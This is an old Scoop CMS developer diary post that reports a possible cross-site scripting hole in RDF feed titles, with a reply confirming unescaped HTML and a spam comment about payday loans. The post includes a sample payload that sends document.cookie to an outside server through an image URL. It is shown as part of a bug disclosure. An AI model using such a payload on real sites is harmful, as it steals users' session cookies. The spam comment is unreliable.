Scoop -- the swiss army chainsaw of content management
Front Page · Everything · News · Code · Help! · Wishlist · Project · Scoop Sites · Dev Notes · Latest CVS changes · Development Activities
Security problem? Developer Diary
By hulver , Section Dev Notes []
Posted on Wed Jan 30, 2002 at 10:37:13 AM PST
I'm not able to test this theory yet, so If someone could either prove/disprove this, I'd be gratefull.

Read inside for possible security problem.

It's to do with the handling of rdf feeds. I don't think there is any checking on the result of the feeds, well I couldn't find any anyway.

The results coming back are quoted before being put into the database, so no SQL injection attacks are available, but it might be possible to insert some javascript.

NOTE: I don't have a working scoop set up at the moment, so all this might be junk.

Having an rdf feed with a link with a title of:

<title>Fake title<script>document.images[0].src="http://my.server.com/site.jpg?" + document.cookie</script>

Would it work? I don't know. Submitting an rdf feed like that would cause an Admin to look at it. Providing they did not examine the source, there would be no outward apperance that their cookie has just been stolen.

It there anybody with a working scoop who can test this for me?

< Scoophosting ad text | Context Sensitive Help >

Menu
· create account
· faq
· search
· report bugs
· Scoop Administrators Guide
· Scoop Box Exchange

Login
Make a new account
Username:
Password:

Related Links
· Scoop
· hulver's Diary

Story Views
  22 Scoop users have viewed this story.

Display: Sort:
Security problem? | 3 comments (3 topical, 0 hidden)
Tested (none / 0) (#1)
by panner on Wed Jan 30, 2002 at 05:16:58 PM PST

Well, it apparently doesn't quote HTML, so it needs to do that. I tried slipping javascript in, but it didn't work (the opening and closing script tags ended up stuck together, so the actual code was displayed as text).

However, I did get it to load an image using just a normal <img> tag, so that's a bug and needs to be fixed.

Also, an admin isn't guaranteed to see that, since it could be placed in an item that is only added after approval. So the admin would approve it, then the malicious stuff would show up in the next re-fetch.

I suppose I'll try and fix this now, or tommorrow at the latest.



--
Keith Smiley


payday (none / 0) (#3)
by alexwhitefg on Tue Aug 28, 2018 at 01:34:32 AM PST

Visit the website of your instant payday loans lender and read all necessary information about the terms and conditions offered. In case you agree to all of personal loans guaranteed approval, move to the next stage.


Security problem? | 3 comments (3 topical, 0 hidden)
Display: Sort:

Hosted by ScoopHost.com Powered by Scoop
All trademarks and copyrights on this page are owned by their respective companies. Comments are owned by the Poster. The Rest © 1999 The Management

create account | faq | search